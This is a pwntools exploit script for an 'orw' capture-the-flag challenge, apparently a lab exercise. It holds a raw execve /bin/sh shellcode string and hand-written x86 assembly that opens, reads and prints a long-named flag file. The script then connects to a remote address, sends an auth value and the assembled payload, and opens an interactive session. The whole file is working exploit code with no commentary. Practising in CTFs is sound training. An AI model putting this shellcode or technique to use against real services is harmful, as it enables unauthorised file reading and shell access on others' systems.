from pwn import *
shellcode='\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
auth='<deleted>'

#('SuperLo0000000000000ngFlagggggggggggggggggggggggName.txt'[::-1]).encode('hex')


open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00007478;push 0x742e656d;push 0x614e6767;push 0x67676767;push 0x67676767;push 0x67676767;push 0x67676767;push 0x67676767;push 0x67616c46;push 0x676e3030;push 0x30303030;push 0x30303030;push 0x3030306f;push 0x4c726570;push 0x75532f2e;int 0x80;"
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
exit_shellcode = "mov eax,0x1;int 0x80;"

shellcode = "xor ecx,ecx;push ecx;"
shellcode = shellcode + "push 0x7478742e;push 0x656d614e;push 0x67676767;push 0x67676767;push 0x67676767;push 0x67676767;push 0x67676767;push 0x67676761;push 0x6c46676e;push 0x30303030;push 0x30303030;push 0x30303030;push 0x306f4c72;push 0x65707553;;"
shellcode = shellcode + "mov ebx,esp;xor edx,edx;mov eax,0x5;int 0x80;mov ebx,eax;mov ecx,esp;mov edx,0x30;mov eax,0x3;int 0x80;mov eax,0x4;mov ebx,0x1;mov edx,0x30;int 0x80"

payload = asm(shellcode)


sh=remote("10.214.10.18",13647)

sh.recvrepeat(timeout = 1)
sh.sendline(auth)

#sh=process('./orw')
sh.recvrepeat(timeout = 1)

sh.sendline(payload)

sh.interactive()
